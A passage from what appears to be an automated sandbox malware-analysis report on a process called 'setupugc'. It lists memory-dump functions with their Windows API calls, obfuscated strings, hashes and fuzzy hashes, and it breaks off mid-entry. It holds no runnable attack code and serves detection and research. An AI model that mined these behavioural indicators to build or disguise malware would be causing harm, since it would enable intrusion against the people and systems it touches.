                          Function 02E739D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02E73AAB
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 0f7f77bb92338009fa2588b866e44393b9f605d567c4954d1e679649aa6f151d
                          • Instruction ID: d46f8bfac2f5ac1efd54cd20a20bef05fb72df6d5ccbba562cdfc5d1d155170f
                          • Opcode Fuzzy Hash: 0f7f77bb92338009fa2588b866e44393b9f605d567c4954d1e679649aa6f151d
                          • Instruction Fuzzy Hash: 6E318EB1641705BBDB14DFA4C881FEBB7B9EB88704F10955DF619AB240D7706A40CBA4
                          Function 02E6F43A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 02E6F457
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize
                          • String ID: @J7<
                          • API String ID: 2538663250-2016760708
                          • Opcode ID: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                          • Instruction ID: b2aff38de3cb24eed981507a6f8e343ebfaeacf227dc01a0fc6d36c5c8fb502e
                          • Opcode Fuzzy Hash: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                          • Instruction Fuzzy Hash: 553154B6A4060A9FDB10DFD8D8809EFB7B9FF88304B108559E506EB214D771EE058BA0
                          Function 02E6F440 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 02E6F457
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize
                          • String ID: @J7<
                          • API String ID: 2538663250-2016760708
                          • Opcode ID: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                          • Instruction ID: 8be1bf8629d183e6496112909fb73edd7461a0da9a5629c19a322a7d521939df
                          • Opcode Fuzzy Hash: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                          • Instruction Fuzzy Hash: 903132B6A40609AFDB10DFD8D8809EFB7B9BF88304B108559E506EB214D775EE458BA0
                          Function 02E64470 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E644E2
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction ID: f7f83bd469acd48db0db17153fab5d0864cf7bc948707a02ae2cf8f7d2a5f2d3
                          • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction Fuzzy Hash: E50121B5D8020DBBDF10EBE4DC46FADB3B99B44308F1095A5E90897281F631E754CB91
                          Function 02E796C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E6826E,00000010,?,?,?,00000044,?,00000010,02E6826E,?,?,?), ref: 02E79723
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                          • Instruction ID: 0e8538d19d746f35120bf81a9003ff0d6a99ad559afd0a04e932e0c2b8393d42
                          • Opcode Fuzzy Hash: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                          • Instruction Fuzzy Hash: 2601D6B2200508BBCB44DF99DC80EEB77ADAF8C714F008208FA09E3240D630F851CBA4
                          Function 02E59BA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E59BE5
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                          • Instruction ID: cde29f1212a4bc87e1a00cd6adda975f6bc08b2acd3f412eb6d7fffcd6d9e689
                          • Opcode Fuzzy Hash: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                          • Instruction Fuzzy Hash: F2F065333D031436E22062A9AC02FDB728D8B80B65F145025FB1DEB1C0DA91B54146E5
                          Function 02E64463 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E644E2
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction ID: 2fb1ec329cc2a10775d63256d2bc1fcd88db320fd27cb1854b68f752fb2a94de
                          • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction Fuzzy Hash: EFF09671E8010DABDF10DAD4D841FE8B7B5EB4535CF00D2D5E90C97280E6319A588B90
                          Function 02E59B9C Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E59BE5
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                          • Instruction ID: 9c020842527d703f54f47f07e94d15b4bfa8b1242c217f1b99840047305eb28f
                          • Opcode Fuzzy Hash: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                          • Instruction Fuzzy Hash: DBE092332C031076E27162A99C52FDB665D8F84B54F245055F71DAF1C0DA91B54187A5
                          Function 02E78200 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02E78240
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$NameName_
                          • String ID:
                          • API String ID: 3514427675-0
                          • Opcode ID: abcd2254d0b384943065786b482d6f4eff3ae2fa125dd9bd8920dd15c6341619
                          • Instruction ID: 4e95f915d97930c98679d0fa61b13f29dacb9494a2389b93311e6a5f84560c43
                          • Opcode Fuzzy Hash: abcd2254d0b384943065786b482d6f4eff3ae2fa125dd9bd8920dd15c6341619
                          • Instruction Fuzzy Hash: ECF039B6240609BBDA20EF69DC41EEB77ADEFC8714F008519FE18A7241D630B9118BB4
                          Function 02E79630 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,02E63CF2,000000F4), ref: 02E7966C
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction ID: 2aa63e3750832b3c7abf067488635fa6cd04637b990b53defafe1b8ed2010c09
                          • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction Fuzzy Hash: F1E065B22406047BDA10EE69EC41FEB77ADEFC8710F008419FD0CA7281DA31B9108BB8
                          Function 02E795E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(02E61979,?,02E7571B,02E61979,02E755AF,02E7571B,?,02E61979,02E755AF,00001000,?,?,00000000), ref: 02E7961F
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction ID: 6b1b06775c4da25e099a46b7e21ac048c224bdead4cb654de44264ae56b76943
                          • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction Fuzzy Hash: EBE06D712402047BDA10EE68DC40FAB37ADDFC5710F008418FD08A7241D670B9148BB5
                          Function 02E682B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                          • Instruction ID: 96c3dc37325ebb887594a8c68b8ab5766fb7eda62c89f0afbc1738d04680fa3a
                          • Opcode Fuzzy Hash: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                          • Instruction Fuzzy Hash: FFE04F752C070427EB24AAA89C49F76335C9B4866CF188660BD2CDB2C5E678E9018158
                          Function 02E682A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                          • Instruction ID: 9fc2f86c37e42becb5bff78802c1a05cedcbb703a1314ff521516101ce436b59
                          • Opcode Fuzzy Hash: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                          • Instruction Fuzzy Hash: 60E0D8794C070017E71056A89E4E76A3218AB04368F1C5754FC7CDB1C7E22CD9468218
                          Function 02E68098 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02E61C60,02E77EEF,02E755AF,02E61C30), ref: 02E680D3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                          • Instruction ID: 2143d903751af623e8b84ed8885ecd9f42c77e591734bc03baa45b48ace0d17a
                          • Opcode Fuzzy Hash: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                          • Instruction Fuzzy Hash: A7E0C2752C03002BF210E6A88C16F5A328D8B44354F019428BD0DDF2C1EA60E50246A1
                          Function 02E680A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02E61C60,02E77EEF,02E755AF,02E61C30), ref: 02E680D3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                          • Instruction ID: 5d2f10622b11bcf2e8f1a79639a9c06cf786aa061530f988b78b213de42e3c96
                          • Opcode Fuzzy Hash: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                          • Instruction Fuzzy Hash: 44D05E756C03043BF650E7E89C26F6A328D8B447A8F059468BE0DDB2C1E964E5014565
                          Function 02E6834E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                          • Instruction ID: 0ad3bcbe055f7158ef82e7014886dd7351bb27823d9aca537af7354d4a141f16
                          • Opcode Fuzzy Hash: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                          • Instruction Fuzzy Hash: 65D097342D184004E7209AACB40C3FA7384EB0B3BC7009A00E83C8E9D8C223A8CE4008
                          Function 03932C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                          • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                          • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                          • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275

                          Non-executed Functions

                          Function 03750469 Relevance: .2, Instructions: 201COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d62e397ca1aabc98452a77443a47db1cc18fe800118123973538c3e5a89521f9
                          • Instruction ID: 977d2054312c3112ff2060e0c9512f812e1e3ea4939b6b3e4ff034a7306ba64b
                          • Opcode Fuzzy Hash: d62e397ca1aabc98452a77443a47db1cc18fe800118123973538c3e5a89521f9
                          • Instruction Fuzzy Hash: 7E510471618B0A4FD36CEF6CD085A76B7E2FB88310F54452DE88AC7252DBB4E8428785
                          Function 0375E089 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                          • API String ID: 0-3558027158
                          • Opcode ID: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                          • Instruction ID: 0900828688ab73f75ebe2a9f9d2194735565dddd216b46a404d637ac30d03770
                          • Opcode Fuzzy Hash: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                          • Instruction Fuzzy Hash: 7D9171F04482988AC7158F54A0612AFFFB1EBC6304F15816DE7E6BB243C3BE8905CB85
                          Function 03753BD1 Relevance: 18.8, Strings: 15, Instructions: 51COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                          • API String ID: 0-3228068659
                          • Opcode ID: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                          • Instruction ID: df1711e064b7e75b0c6408a95e63b5ca3c850b7aa13dd796088b1ac313a1a518
                          • Opcode Fuzzy Hash: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                          • Instruction Fuzzy Hash: A92144B081468C8BDF14DF86D995AECBF71FB00348F608108E8446F3A4D7781A42CF8A
                          Function 03932890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                          • Instruction ID: 3f683ee95bb841d681bbd94a7617c6985ab16f3a7601c78e2f5a5c1fd4992e11
                          • Opcode Fuzzy Hash: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                          • Instruction Fuzzy Hash: 8651D6F6A00256BFCB14DF98C99097EF7BCFB4A2407148AA9E4A5D7641D374DE40CBA0
                          Function 039A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                          • Instruction ID: 59a4d2da6dacd6525301ddb14788c819f0979f4e425396a888117d662069a6a7
                          • Opcode Fuzzy Hash: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                          • Instruction Fuzzy Hash: A4510875A04A55AECB30DF9CC89097FF7FDEB44240B088DA9E5D5DB641E7B4DA0087A0
                          Function 03927630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                          • Execute=1, xrefs: 03964713
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                          • ExecuteOptions, xrefs: 039646A0
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                          • Instruction ID: a33dfec2e5276b0dc6c4e6e15b7d280eb08007d883385ca49c6a40575bcb158f
                          • Opcode Fuzzy Hash: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                          • Instruction Fuzzy Hash: D9513735A017296ADF10FAE8DC89FAE7BACAF44340F0404E9D505FB186E7719A45CF51
                          Function 039C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction ID: a72e106f94263303c3b42572f1ad02e1f07d26af0b80d7a67bbfa83ea1f63550
                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction Fuzzy Hash: DB021775518381AFD305CF68C890A6BBBE9EFC8740F08892DF9855B265DB31E905CB52
                          Function 0393B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: 0466fad1c4cde100c0001cf5744769daee17a83935582127fd5cc290bd8c62f8
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 2481FFF0E412499EDF24DE68C8917FEBBBAEF463A0F1C455AD862A7791C7308840CB51
                          Function 039A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                          • Instruction ID: 8fe78f0c0fbaa791971238ea3408704cb6db34c01a9e721ca8faae3584fe6bb7
